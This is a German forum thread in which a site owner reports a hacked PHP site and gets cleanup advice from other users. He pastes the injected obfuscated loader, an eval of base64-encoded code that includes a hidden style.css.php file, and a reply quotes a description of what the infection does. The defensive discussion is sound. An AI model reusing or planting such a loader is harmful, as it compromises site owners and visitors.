Seite gehackt

[Cipolla]

Tja, da schauts wohl aus als ob eine Seite gehakt wurde. Alle PHP-Dateien sind mit verschlüsseltem Code versehen worden:

(Die Leerzeichen zwischen base habe ich reingemacht, da ich nicht weiß wie phpBB das behandelt)

Code: Select all

<?php /**/eval(b a s e 6 4_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzMvZDI2NDA1NjM3L2h0ZG9jcy9tZWdhc3VzL2Ntcy9pbmNsdWRlL2luY19leHQvZmNrZWRpdG9yL2VkaXRvci9maWxlbWFuYWdlci9icm93c2VyL2RlZmF1bHQvaW1hZ2VzL2ljb25zLzMyL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

Ich wollte die Seite auf den aktuellen Stand bringen, und beim abgleichen von Dateien ist mir das aufgefallen. Version ist zur Zeit noch 1.3.9

Liegt auf einem 1&1 Server. (Ja ich weiß, Jugensünde

[flip-flop]

Dann dekodiere das mal (Base 64 Decoder) und nimm auf jeden Fall diese Datei raus und analysiere:

include/inc_ext/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php

-> http://forums.oscommerce.com/topic/3366 ... lp-please/

Posted 22 May 2009 - 09:28 AM
this infection does the following:
- adds a gifimg.php (or similarly named file) to most/all of your image directories
- adds a javascript function to many index.htm or index.html files on your site
- adds a javascript function to many .js files on your site.

FYI.

[Cipolla]

Yo, dank dir. Hatte das bereits dekodieren lassen, allerdings ist die style.css.php nochmals und nochmals codiert. Iwan hat der mir auch einen Fehler gemeldet, da hatte ich keinen Bock mehr.

Ich werde demnächst sowieso ein Update auf die aktuelle Version machen. Eigene bzw. geänderte php-Dateien sinds nur zwei-drei Stück, die kann ich dann von Hand kontrollieren.

[flip-flop]

Ja, ich hatte irgendwo gelesen dass die Dateien bis zu 10 mal kodiert sind.
U.U. könnte das noch wichtig sein: "- adds a javascript function to many .js files on your site"

Knut

[Cipolla]

Danke dir für den Hinweis. .js (Javascript)-Dateien habe ich allerdings keine eigenen oder geänderte auf dem Server. Ich habe grade noch ein relativ aktuelles Backup gefunden. Da sind diese Injektions noch nicht drin.

Denke ich spiele das Backup parallel auf und werde das dann updaten.

War das jetzt eine Sicherheitslücke im fckeditor? Es gab ja mal ein Update wegen einer solchen Schwachstelle wenn ich mich recht erinnere.

[flip-flop]

Schulterzuck,

dieses Teil befällt alle was php spricht, shops, bloggs usw. Ob die befallen Seiten auch diese ältere Variante des FCK verwenden weiß ich nicht. Könnte aber sein.

Sind die Dateien in der Nähe des FCK generiert worden?

Auch die html-Dateien des FCK prüfen.

Knut

[juergen]

Das Teil schadet nur wenn register globals auf ON steht.

Ich würde den FCK Editor einzeln updaten.

[Cipolla]

Ja, da wären wir dann wieder bei 1und1. Ich meine mich zu erinnern, das ich das vor jahren schon umgestellt haben wollte aber nada. Machen die nicht. Per .htaccess gings glaub ich iwi auch nicht (Fehler 500 oder so)

Aber wie gesagt, ich date das auf ie aktuelle und dann mal schauen ob die seite ruhe hat.